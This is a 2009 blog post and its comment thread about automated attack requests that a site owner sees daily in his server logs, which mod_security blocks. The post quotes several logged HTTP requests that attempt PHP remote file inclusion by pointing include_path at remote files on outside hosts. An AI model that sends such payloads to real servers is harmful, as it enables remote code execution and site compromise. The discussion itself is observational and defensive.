Let's do something stupid!: Dmitry Dulepov

Posted on 22.11.09 23:33

Let's try some stupid HTTP requests to my server For example, this:

GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close

GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.vnmhost.net/01.gif? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

GET /article/advanced-guestbook-spam-blocking.html//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

I see requests like this daily in security logs of both my servers. They all are stopped by mod_security.

I wonder am I the only one who gets tons of this scum? If anybody else monitors his/her server security, you are welcome to share your "statistics" about these automated attacks to non–existing web applications.

Comments

Dan Osipov, 23-11-09 00:32:

See them all the time. None of them get through, so I just ignore them.

Steffen Müller, 23-11-09 11:13:

Same here. Just ignore the noise.

Chris, 23-11-09 17:59:

I've once tried to setup mod_security2 for a Typo3 installation... I didn't manage to do it in the time frame I deemed appropriate... It blocked away stuff like the standard tt_news "click-to-enlarge".

Are there any Typo3-mod_security tutorials around or maybe even a ruleset maintained by the t3sec team or something like that?

Dmitry Dulepov, 23-11-09 18:10:

Chris, no, nothing like that around. Security is a very special topic...

Dan & Steffen, they do not bother me much except that I always wonder for stupidity of such attacks. They not only waste my resources, they also waste their own. It looks like some beginner hacker attempts.

Alex, 30-11-09 20:05:

I think most of them are simply bruteforce-attacks that try various of known security hole expolits - without first checking the target system and _then_ apply some exploits to it.

Alban, 02-12-09 16:54:

Same here, lot of noise with these requests. However I have had 2 server hacked with the success of such commands.
One was a phpmyadmin exploit which gave the attacker a shell access from a forged http request. Another had been exploiting a hole in phpnuke and allowed the download and execution of a remote shell.
Almost every piece of software has security holes, so solutions like mod_security are required to block such http requests before they reach any hole. It too bad mod_security is so difficult to configure though...

Tomasz, 08-12-09 11:47:

I think that this blog is dying, unfortunately...

Dmitry Dulepov, 04-01-10 09:35:

Tomasz, it does not

I simply do not have enough time and motivation to write on TYPO3 topics. I have lots of other stuff to write about but I doubt it will be interesting to existing visitors :(

Add a comment

All fields in this form are required!

Let's do something stupid!

Comments

Add a comment

Categories

Pages

Top posts